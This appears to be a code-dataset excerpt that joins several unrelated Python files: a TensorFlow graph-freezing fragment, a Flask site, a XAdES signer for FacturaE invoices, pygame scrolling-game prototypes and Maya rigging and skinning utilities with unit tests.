with tf.Graph().as_default() as g:
graph = session.graph
input_graph_def = graph.as_graph_def()
graph_util.convert_variables_to_constants
constant_graph = graph_util.convert_variables_to_constants(session, input_graph_def, output_node_names=['output/main_output'])
#由于采用了name_scope所以在main_output之前需要加上score/
with tf.gfile.FastGFile(output_fld+output_graph_name, mode='wb') as f:
f.write(constant_graph.SerializeToString())
```
#### File: 1flurry/Xiaoyu.github.io/www.py
```python
from flask import *
from apps.restful import api
import json
from flask_bootstrap import Bootstrap
app = Flask(__name__)
Bootstrap(app)
app.register_blueprint(api)
@app.route('/')
def index():
return render_template("base.html")
@app.route('/about')
def resume():
return render_template("resume.html")
@app.route('/blog')
def blog():
return render_template("blog.html")
@app.route('/link')
def link():
return render_template("link.html")
if __name__ == '__main__':
app.run(host='127.0.0.1',debug=True)
``` |
{
"source": "1fox/firma_xades",
"score": 2
} |
#### File: 1fox/firma_xades/firma.py
```python
u"""
Firma facturaE.xml
@author: <NAME>e 9 16:49:47 CET 2019
https://github.com/juhegue/firma_xades
Minor adaptation
@author: 1Fox mié oct 9 16:49:47 CET 2019
https://github.com/1fox/firma_xades
Página para chequear la factura firmada
http://sedeaplicaciones2.minetur.gob.es/FacturaE/
"""
__version__ = '0.0.1a'
import base64
import datetime
import hashlib
from lxml import etree
from OpenSSL import crypto
import random
import urllib
import xmlsig
def parse_xml(name):
return etree.parse(name).getroot()
def save_xml(name, data):
with open(name, 'wb') as w:
w.write(data)
def leecertificado(name):
with open(name, 'rb') as f:
return f.read()
def sign_file(cert, password, xml_firma):
random_val = random.randint(1, 99999)
signature_id = 'Signature-%s' % random_val
signed_properties_id = 'SignedProperties-%s' % signature_id
signature_value = 'SignatureValue-%s' % random_val
qualifying_properties = 'QualifyingProperties-%05d' % random_val
key_info_id = 'KeyInfoId-%s' % signature_id
reference_id = 'Reference-%05d' % random_val
object_id = 'XadesObjectId-%05d' % random_val
xades = 'http://uri.etsi.org/01903/v1.3.2#'
ds = 'http://www.w3.org/2000/09/xmldsig#'
xades141 = 'http://uri.etsi.org/01903/v1.4.1#'
sig_policy_identifier = 'http://www.facturae.es/politica_de_firma_formato_facturae/politica_de_firma_formato_facturae_v3_1.pdf'
sig_policy_hash_value = 'Ohixl6upD6av8N7pEvDABhEL6hM='
root = xml_firma
certificate = crypto.load_pkcs12(cert, password)
sign = etree.Element(
etree.QName(ds, 'Signature'),
nsmap={'ds': ds, 'xades': 'http://uri.etsi.org/01903/v1.3.2#'},
attrib={
xmlsig.constants.ID_ATTR: signature_id,
}
)
signed_info = etree.SubElement(
sign,
etree.QName(ds, 'SignedInfo')
)
etree.SubElement(
signed_info,
etree.QName(ds, 'CanonicalizationMethod'),
attrib={
'Algorithm': xmlsig.constants.TransformInclC14N
}
)
etree.SubElement(
signed_info,
etree.QName(ds, 'SignatureMethod'),
attrib={
'Algorithm': xmlsig.constants.TransformRsaSha256
}
)
reference = etree.SubElement(
signed_info,
etree.QName(ds, 'Reference'),
attrib={
xmlsig.constants.ID_ATTR: reference_id,
'URI': ''
}
)
transforms = etree.SubElement(
reference,
etree.QName(ds, 'Transforms'),
)
etree.SubElement(
transforms,
etree.QName(ds, 'Transform'),
attrib={
'Algorithm': 'http://www.w3.org/2000/09/xmldsig#enveloped-signature'
}
)
etree.SubElement(
reference,
etree.QName(ds, 'DigestMethod'),
attrib={
'Algorithm': 'http://www.w3.org/2001/04/xmlenc#sha256'
}
)
etree.SubElement(
reference,
etree.QName(ds, 'DigestValue')
)
sec_reference = etree.SubElement(
signed_info,
etree.QName(ds, 'Reference'),
attrib={
xmlsig.constants.ID_ATTR: 'ReferenceKeyInfo',
'URI': '#' + key_info_id
}
)
etree.SubElement(
sec_reference,
etree.QName(ds, 'DigestMethod'),
attrib={
'Algorithm': 'http://www.w3.org/2001/04/xmlenc#sha256'
}
)
digest_value2 = hashlib.sha256(
crypto.dump_certificate(
crypto.FILETYPE_ASN1,
certificate.get_certificate()
)
)
etree.SubElement(
sec_reference,
etree.QName(ds, 'DigestValue')
).text = base64.b64encode(digest_value2.digest())
tr_reference = etree.SubElement(
signed_info,
etree.QName(ds, 'Reference'),
attrib={
'Type': 'http://uri.etsi.org/01903#SignedProperties',
'URI': '#' + signed_properties_id,
}
)
etree.SubElement(
tr_reference,
etree.QName(ds, 'DigestMethod'),
attrib={
'Algorithm': 'http://www.w3.org/2001/04/xmlenc#sha256'
}
)
digest_value3 = hashlib.sha256(
crypto.dump_certificate(
crypto.FILETYPE_ASN1,
certificate.get_certificate()
)
)
etree.SubElement(
tr_reference,
etree.QName(ds, 'DigestValue')
).text = base64.b64encode(digest_value3.digest())
etree.SubElement(
sign,
etree.QName(ds, 'SignatureValue'),
attrib={
xmlsig.constants.ID_ATTR: signature_value
}
)
key_info = etree.SubElement(
sign,
etree.QName(ds, 'KeyInfo'),
attrib={
xmlsig.constants.ID_ATTR: key_info_id
}
)
x509 = etree.SubElement(
key_info,
etree.QName(ds, 'X509Data'),
)
etree.SubElement(
x509,
etree.QName(ds, 'X509Certificate'),
)
etree.SubElement(
key_info,
etree.QName(ds, 'KeyValue'),
)
object_node = etree.SubElement(
sign,
etree.QName(xmlsig.constants.DSigNs, 'Object'),
attrib={xmlsig.constants.ID_ATTR: object_id}
)
qualifying_properties = etree.SubElement(
object_node,
etree.QName(xades, 'QualifyingProperties'),
nsmap={'xades': xades, 'xades141': xades141},
attrib={
xmlsig.constants.ID_ATTR: qualifying_properties,
'Target': '#' + signature_id
})
signed_properties = etree.SubElement(
qualifying_properties,
etree.QName(xades, 'SignedProperties'),
attrib={
xmlsig.constants.ID_ATTR: signed_properties_id
}
)
signed_signature_properties = etree.SubElement(
signed_properties,
etree.QName(xades, 'SignedSignatureProperties')
)
etree.SubElement(
signed_signature_properties,
etree.QName(xades, 'SigningTime')
).text = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S%z')
signing_certificate = etree.SubElement(
signed_signature_properties,
etree.QName(xades, 'SigningCertificate')
)
signing_certificate_cert = etree.SubElement(
signing_certificate,
etree.QName(xades, 'Cert')
)
cert_digest = etree.SubElement(
signing_certificate_cert,
etree.QName(xades, 'CertDigest')
)
etree.SubElement(
cert_digest,
etree.QName(xmlsig.constants.DSigNs, 'DigestMethod'),
attrib={
'Algorithm': 'http://www.w3.org/2001/04/xmlenc#sha256'
}
)
hash_cert = hashlib.sha256(
crypto.dump_certificate(
crypto.FILETYPE_ASN1,
certificate.get_certificate()
)
)
etree.SubElement(
cert_digest,
etree.QName(xmlsig.constants.DSigNs, 'DigestValue')
).text = base64.b64encode(hash_cert.digest())
issuer_serial = etree.SubElement(
signing_certificate_cert,
etree.QName(xades, 'IssuerSerial')
)
etree.SubElement(
issuer_serial,
etree.QName(xmlsig.constants.DSigNs, 'X509IssuerName')
).text = xmlsig.utils.get_rdns_name(certificate.get_certificate().to_cryptography().issuer.rdns)
etree.SubElement(
issuer_serial,
etree.QName(xmlsig.constants.DSigNs, 'X509SerialNumber')
).text = str(certificate.get_certificate().get_serial_number())
signature_policy_identifier = etree.SubElement(
signed_signature_properties,
etree.QName(xades, 'SignaturePolicyIdentifier')
)
signature_policy_id = etree.SubElement(
signature_policy_identifier,
etree.QName(xades, 'SignaturePolicyId')
)
sig_policy_id = etree.SubElement(
signature_policy_id,
etree.QName(xades, 'SigPolicyId')
)
etree.SubElement(
sig_policy_id,
etree.QName(xades, 'Identifier')
).text = sig_policy_identifier
etree.SubElement(
sig_policy_id,
etree.QName(xades, 'Description')
).text = 'facturae31'
sig_policy_hash = etree.SubElement(
signature_policy_id,
etree.QName(xades, 'SigPolicyHash')
)
etree.SubElement(
sig_policy_hash,
etree.QName(xmlsig.constants.DSigNs, 'DigestMethod'),
attrib={
'Algorithm': 'http://www.w3.org/2000/09/xmldsig#sha1'
})
try:
remote = urllib.urlopen(sig_policy_identifier)
hash_value = base64.b64encode(hashlib.sha1(remote.read()).digest())
except Exception as e:
hash_value = sig_policy_hash_value
etree.SubElement(
sig_policy_hash,
etree.QName(xmlsig.constants.DSigNs, 'DigestValue')
).text = hash_value
etsi = xades
signer_role = etree.SubElement(
signed_signature_properties,
etree.QName(etsi, 'SignerRole')
)
claimed_roles = etree.SubElement(
signer_role,
etree.QName(etsi, 'ClaimedRoles')
)
etree.SubElement(
claimed_roles,
etree.QName(etsi, 'ClaimedRole')
).text = 'emisor'
ctx = xmlsig.SignatureContext()
key = crypto.load_pkcs12(cert, password)
ctx.x509 = key.get_certificate().to_cryptography()
ctx.public_key = ctx.x509.public_key()
ctx.private_key = key.get_privatekey().to_cryptography_key()
# print (etree.tostring(sign))
root.append(sign)
ctx.sign(sign)
return etree.tostring(root, encoding='UTF-8', xml_declaration=True, standalone=False)
def firma_xml(certificado, clave, factura_xml, factura_xml_firmada):
sig_xml = sign_file(leecertificado(certificado), clave, parse_xml(factura_xml))
save_xml(factura_xml_firmada, sig_xml)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter, )
parser.add_argument('-v', '--version', action='version', version='%(prog)s ' + __version__)
parser.add_argument('-o', dest='origen', type=str, required=True, help='factura xml origen.')
parser.add_argument('-d', dest='destino', type=str, required=False, help='factura xml destino.')
parser.add_argument('-c', dest='certificado', type=str, required=True, help='certificado.')
parser.add_argument('-p', dest='clave', type=str, required=True, help='clave.')
args = parser.parse_args()
try:
sig_xml = sign_file(leecertificado(args.certificado), str.encode(args.clave), parse_xml(args.origen))
save_xml(args.destino or args.origen, sig_xml)
except crypto.Error as e:
print ('Error en certificado/clave')
except IOError as e:
print ('%s' % e)
``` |
{
"source": "1fth3n3ls3/pygamescroll2d",
"score": 3
} |
#### File: 1fth3n3ls3/pygamescroll2d/space_trucker_no_pool.py
```python
import pygame
import random
from pygame.locals import (
KEYDOWN,
K_UP,
K_DOWN,
K_RIGHT,
K_LEFT,
QUIT,
K_ESCAPE
)
# CONSTANTS
SCREEN_WIDTH = 640
SCREEN_HEIGHT = 480
class Player(pygame.sprite.Sprite):
def __init__(self):
super(Player, self).__init__()
self.surf = pygame.Surface((64, 16))
self.surf.fill((192, 192, 192))
self.rect = self.surf.get_rect()
def update(self, keys_pressed):
if self.rect.bottom < SCREEN_HEIGHT and keys_pressed[K_DOWN]:
self.rect.move_ip(0, 4)
if self.rect.top > 0 and keys_pressed[K_UP]:
self.rect.move_ip(0, -4)
if self.rect.left > 0 and keys_pressed[K_LEFT]:
self.rect.move_ip(-4, 0)
if self.rect.right < SCREEN_WIDTH and keys_pressed[K_RIGHT]:
self.rect.move_ip(4, 0)
class Enemy(pygame.sprite.Sprite):
def __init__(self):
super(Enemy, self).__init__()
self.surf = pygame.Surface((16, 4))
self.surf.fill((255, 255, 255))
self.rect = self.surf.get_rect(
center = (random.randint(SCREEN_WIDTH + 16, SCREEN_WIDTH + 128),
random.randint(0, SCREEN_HEIGHT))
)
self.speed = random.randint(4, 32)
def update(self):
self.rect.move_ip(-self.speed, 0)
if self.rect.right < 0: self.kill()
def main():
screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))
ADDENEMY = pygame.USEREVENT + 1 # create new userevent
pygame.time.set_timer(ADDENEMY, 250)
run = True
player = Player()
enemies = pygame.sprite.Group()
all_sprites = pygame.sprite.Group()
all_sprites.add(player)
while run:
for event in pygame.event.get():
if event.type == QUIT:
run = False
if event.type == KEYDOWN and event.key == K_ESCAPE:
run = False
if event.type == ADDENEMY:
new_enemy = Enemy()
enemies.add(new_enemy)
all_sprites.add(new_enemy)
player.update(pygame.key.get_pressed())
enemies.update()
screen.fill((0, 0, 50))
for entity in all_sprites:
screen.blit(entity.surf, entity.rect)
pygame.display.flip()
if __name__ == "__main__":
import cProfile as profile
# main()
pygame.init()
profile.run("main()")
pygame.quit()
```
#### File: 1fth3n3ls3/pygamescroll2d/space_trucker.py
```python
import pygame
import random
from pygame.locals import (
KEYDOWN,
K_UP,
K_DOWN,
K_RIGHT,
K_LEFT,
QUIT,
K_ESCAPE
)
# CONSTANTS
SCREEN_WIDTH = 640
SCREEN_HEIGHT = 480
ENEMY_COUNT = 20
class Player(pygame.sprite.Sprite):
def __init__(self):
super(Player, self).__init__()
self.surf = pygame.Surface((64, 16))
self.surf.fill((192, 192, 192))
self.rect = self.surf.get_rect()
def update(self, keys_pressed):
if self.rect.bottom < SCREEN_HEIGHT and keys_pressed[K_DOWN]:
self.rect.move_ip(0, 4)
if self.rect.top > 0 and keys_pressed[K_UP]:
self.rect.move_ip(0, -4)
if self.rect.left > 0 and keys_pressed[K_LEFT]:
self.rect.move_ip(-4, 0)
if self.rect.right < SCREEN_WIDTH and keys_pressed[K_RIGHT]:
self.rect.move_ip(4, 0)
class Enemy(pygame.sprite.DirtySprite):
def __init__(self):
super(Enemy, self).__init__()
self.surf = pygame.Surface((16, 4))
self.surf.fill((255, 255, 255))
self.rect = self.surf.get_rect(center = self._get_random_pos())
self.speed = random.randint(4, 16)
def update(self):
self.rect.move_ip(-self.speed, 0)
if self.rect.right < 0: self.kill()
def spawn(self):
self.rect.center = self._get_random_pos()
def _get_random_pos(self):
return random.randint(SCREEN_WIDTH + 16, SCREEN_WIDTH + 128), random.randint(0, SCREEN_HEIGHT)
def main():
clock = pygame.time.Clock()
screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))
ADDENEMY = pygame.USEREVENT + 1 # create new userevent
pygame.time.set_timer(ADDENEMY, 250)
run = True
enemy_counter = 0
player = Player()
enemies = pygame.sprite.Group()
enemies_pool = [Enemy() for i in range(ENEMY_COUNT)]
all_sprites = pygame.sprite.Group()
all_sprites.add(player)
while run:
for event in pygame.event.get():
if event.type == QUIT:
run = False
if event.type == KEYDOWN and event.key == K_ESCAPE:
run = False
if event.type == ADDENEMY:
enemy_counter = 0 if enemy_counter >= ENEMY_COUNT-1 else enemy_counter + 1
enemy = enemies_pool[enemy_counter]
if not enemy.alive():
enemy.spawn()
enemies.add(enemy)
all_sprites.add(enemy)
if pygame.sprite.spritecollideany(player, enemies):
player.kill()
run = False
player.update(pygame.key.get_pressed())
enemies.update()
screen.fill((0, 0, 50))
for entity in all_sprites:
screen.blit(entity.surf, entity.rect)
pygame.display.flip()
clock.tick(60)
if __name__ == "__main__":
pygame.init()
import cProfile as profile
profile.run("main()")
# main()
pygame.quit()
``` |
{
"source": "1fth3n3ls3/pylib",
"score": 3
} |
#### File: 1fth3n3ls3/pylib/hierarchyconvertergui.py
```python
from PySide2 import QtWidgets, QtCore, QtGui
class Window(QtWidgets.QMainWindow):
convertPressed = QtCore.Signal(str)
def __init__(self, title='', parent=None):
super(Window, self).__init__(parent=parent)
self.setWindowTitle(title)
self.configureWidgets()
self.connectEvents()
def configureWidgets(self):
self.container = QtWidgets.QWidget(self)
self.layout = QtWidgets.QHBoxLayout(self.container)
self.container.setLayout(self.layout)
self.label = QtWidgets.QLabel('Prefix: ', self.container)
self.textBox = QtWidgets.QLineEdit(self.container)
self.button = QtWidgets.QPushButton('Convert', self.container)
self.layout.addWidget(self.label)
self.layout.addWidget(self.textBox)
self.layout.addWidget(self.button)
self.setCentralWidget(self.container)
def connectEvents(self):
self.button.clicked.connect(self.onClick)
# self.controller.selectionChanged.connect(self.updateStatusBar)
def updateStatusBar(self, newSel):
if not newSel:
txt = 'Nothing selected.'
elif len(newSel) == 1:
txt = '{0} selected'.format(newSel[0])
else:
txt = '{0} objects selected.'.format(str(len(newSel)))
self.statusBar().showMessage(txt)
# events
def onClick(self):
self.convertPressed.emit(self.textBox.text())
class ConvertHierarchyController(QtCore.QObject):
selectionChanged = QtCore.Signal(list)
def _pytest():
import random
controller = ConvertHierarchyController()
def nextSel():
return random.choice([
[],
['single'],
['single', 'double']])
def onConvert(prefix):
print('Convert clicked! Prefix:', prefix)
controller.selectionChanged.emit(nextSel())
app = QtWidgets.QApplication([])
win = Window('Hierarchy Converter')
win.convertPressed.connect(onConvert)
controller.selectionChanged.connect(win.updateStatusBar)
win.show()
app.exec_()
if __name__ == "__main__":
_pytest()
```
#### File: 1fth3n3ls3/pylib/hierarchyconvertermaya.py
```python
import hierarchyconvertergui as gui
import utils
import pymel.core as pmc
import maya.OpenMaya as om
import charcreator
from PySide2 import QtCore
_window = None
# def show():
# global _window
# if _window is None:
# cont = gui.ConvertHierarchyController()
# def emiSelChanged(_):
# """This methods emits a list of selected nodes"""
# cont.selectionChanged.emit(pmc.selected(type='transform'))
# om.MEventMessage.addEventCallback('SelectionChanged', emiSelChanged)
# parent = utils.getMayaWindow()
# _window = gui.Window(cont, parent=parent)
# def onConvert(prefix):
# settings = dict(charcreator.SETTINGS_DEFAULT,
# prefix=unicode(prefix))
# charcreator.convert_hierarchies_main(settings)
# _window.convertPressed.connect(onConvert)
# _window.show()
class MayaController(QtCore.QObject):
"""
# Call this way from shelve
from pylib.hierarchyconvertermaya import MayaController
MayaController()
"""
view = None
selectionChanged = QtCore.Signal(list) # must be defined as class atributte
def __init__(self):
super(MayaController, self).__init__() # needed to initialize QObject
if MayaController.view is None:
MayaController.view = gui.Window('Hierarchy Converter', parent=utils.getMayaWindow())
self.establishConnections()
MayaController.view.show()
def emitSelectionChanged(self, _):
"""This methods emits a list of selected nodes"""
self.selectionChanged.emit(pmc.selected(type='transform'))
def establishConnections(self):
self.selectionChanged.connect(MayaController.view.updateStatusBar)
MayaController.view.convertPressed.connect(self.onConvert)
om.MEventMessage.addEventCallback('SelectionChanged', self.emitSelectionChanged)
def onConvert(self, prefix):
settings = dict(charcreator.SETTINGS_DEFAULT,
prefix=unicode(prefix))
charcreator.convert_hierarchies_main(settings)
```
#### File: 1fth3n3ls3/pylib/skeletonutils.py
```python
import pymel.core as pmc
import utils
# Version 3
def safe_setparent(node, parent):
"""`node.setParent(parent)` if `parent` is
not the same as `node`'s existing parent.
"""
if node.getParent() != parent:
node.setParent(parent)
GREEN = 14
BLUE = 6
YELLOW = 17
def _convert_to_joint(node, parent, prefix,
jnt_size, lcol, rcol, ccol):
pmc.select(clear=True)
j = pmc.joint(name=prefix + node.name())
safe_setparent(j, parent)
j.translate.set(node.translate.get())
j.rotate.set(node.rotate.get())
j.setRadius(jnt_size)
def calc_wirecolor():
x = j.translateX.get()
if x < -0.001:
return rcol
elif x > 0.001:
return lcol
else:
return ccol
j.overrideColor.set(calc_wirecolor())
return j
def convert_to_skeleton(rootnode,
prefix='skel_',
joint_size=1.0,
lcol=BLUE,
rcol=GREEN,
ccol=YELLOW,
_parent=None):
if _parent is None:
_parent = rootnode.getParent()
j = _convert_to_joint(
rootnode, _parent, prefix, joint_size, lcol, rcol, ccol)
children = [node for node in rootnode.getChildren() if utils.isType(node, 'transform')]
for c in children:
convert_to_skeleton(c, prefix, joint_size, lcol, rcol, ccol, j)
return j
def ancestors(node):
"""Return a list of ancestors, starting with the direct parent
and ending with the top-level (root) parent."""
result = []
parent = node.getParent()
while parent is not None:
result.append(parent)
parent = parent.getParent()
return result
def uniqueroots(nodes): #(1)
"""Returns a list of the nodes in `nodes` that are not
children of any node in `nodes`."""
result = []
def handle_node(node): #(2)
"""If any of the ancestors of n are in realroots,
just return, otherwise, append n to realroots.
"""
for ancestor in ancestors(node):
if ancestor in nodes: #(4)
return
result.append(node) #(5)
for node in nodes: #(3)
handle_node(node)
return result
```
#### File: 1fth3n3ls3/pylib/skinutils.py
```python
import unittest
import pymel.core as pmc
class denormalized_skin_1(object):
"""Turns off skin cluster normalization and maintaining
max influrnces."""
def __init__(self, skinCl):
self.skinCl = skinCl
self.maxInfl, self.norm = None, None
def __enter__(self):
self.maxInfl = self.skinCl.maintainMaxInfluences.get()
self.norm = self.skinCl.setNormalizeWeights(q=True)
self.skinCl.maintainMaxInfluences.set(False)
self.skinCl.setNormalizeWeights(0)
def __exit__(self, *_):
if self.maxInfl is not None:
self.skinCl.maintainMaxInfluences.set(self.maxInfl)
if self.norm is not None:
self.skinCl.setNormalizeWeights(self.norm)
_denormalized_skins = set() #(1)
class denormalized_skin_2(object):
"""Turns off skin cluster normalization and maintaining
max influrnces."""
def __init__(self, skinCl):
self.skinCl = skinCl
self.maxInfl, self.norm = None, None
def __enter__(self):
if self.skinCl in _denormalized_skins: #(2)
return
_denormalized_skins.add(self.skinCl) #(3)
self.maxInfl = self.skinCl.maintainMaxInfluences.get()
self.norm = self.skinCl.setNormalizeWeights(q=True)
self.skinCl.maintainMaxInfluences.set(False)
self.skinCl.setNormalizeWeights(0)
def __exit__(self, *_):
_denormalized_skins.discard(self.skinCl) #(4)
if self.maxInfl is not None: #(5)
self.skinCl.maintainMaxInfluences.set(self.maxInfl)
if self.norm is not None:
self.skinCl.setNormalizeWeights(self.norm)
denormalized_skin = denormalized_skin_2
def swap_influence_1(skinCl, vert, inflA, inflB):
"""For a given vertex,
swaps the weight between two influences."""
valA = pmc.skinPercent(skinCl, vert, q=True, t=inflA)
valB = pmc.skinPercent(skinCl, vert, q=True, t=inflB)
with denormalized_skin(skinCl):
pmc.skinPercent(skinCl, vert, tv=[inflA, valB])
pmc.skinPercent(skinCl, vert, tv=[inflB, valA])
def swap_influence_2(skinCl, vert, inflA, inflB):
"""For a given vertex,
swaps the weight between two influences."""
with denormalized_skin(skinCl):
swap_influence_fast(skinCl, vert, inflA, inflB)
def swap_influence_fast(skinCl, vert, inflA, inflB):
"""For a given vertex,
swaps the weight between two influences.
`skinCl` should be denormalized before calling this function.
See `denormalized_skin`.
"""
valA = pmc.skinPercent(skinCl, vert, q=True, t=inflA)
valB = pmc.skinPercent(skinCl, vert, q=True, t=inflB)
pmc.skinPercent(skinCl, vert, tv=[inflA, valB])
pmc.skinPercent(skinCl, vert, tv=[inflB, valA])
class Tests(unittest.TestCase):
def setUp(self):
try:
for t in 'joint', 'skinCluster', 'transform':
for o in pmc.ls(type=t):
if pmc.objExists(o):
print(o.name(), ' object ---------------------------')
pmc.delete(o)
except:
pass
def _testSwap(self, func, swap):
global denormalized_skin
denormalized_skin = func
joints = [
pmc.joint(p=(-3.0, 0.0,-12.0)),
pmc.joint(p=(-3.0, 0.0, -5.0)),
pmc.joint(p=(1.0, 0.0, 5.5)),
pmc.joint(p=(6.0, 0.0, 10.0))]
plane = pmc.polyPlane(w=20.0,h=20.0,sx=25,sy=25)[0]
cl = pmc.skinCluster(joints, plane)
def getweight(ind):
return pmc.skinPercent(cl, plane.vtx[0], q=True, t=joints[ind])
self.assertEqual(getweight(0), 0.0)
self.assertEqual(getweight(1), 0.5)
swap(cl, plane.vtx[0], joints[0], joints[1])
self.assertEqual(getweight(0), 0.5)
self.assertEqual(getweight(1), 0.0)
def testDenorm1Swap1(self):
self._testSwap(denormalized_skin_1, swap_influence_1)
def testDenorm1Swap2(self):
self._testSwap(denormalized_skin_1, swap_influence_2)
def testDenorm2Swap2(self):
self._testSwap(denormalized_skin_2, swap_influence_2)
if __name__ == '__main__':
unittest.main()
``` |
Subsets and Splits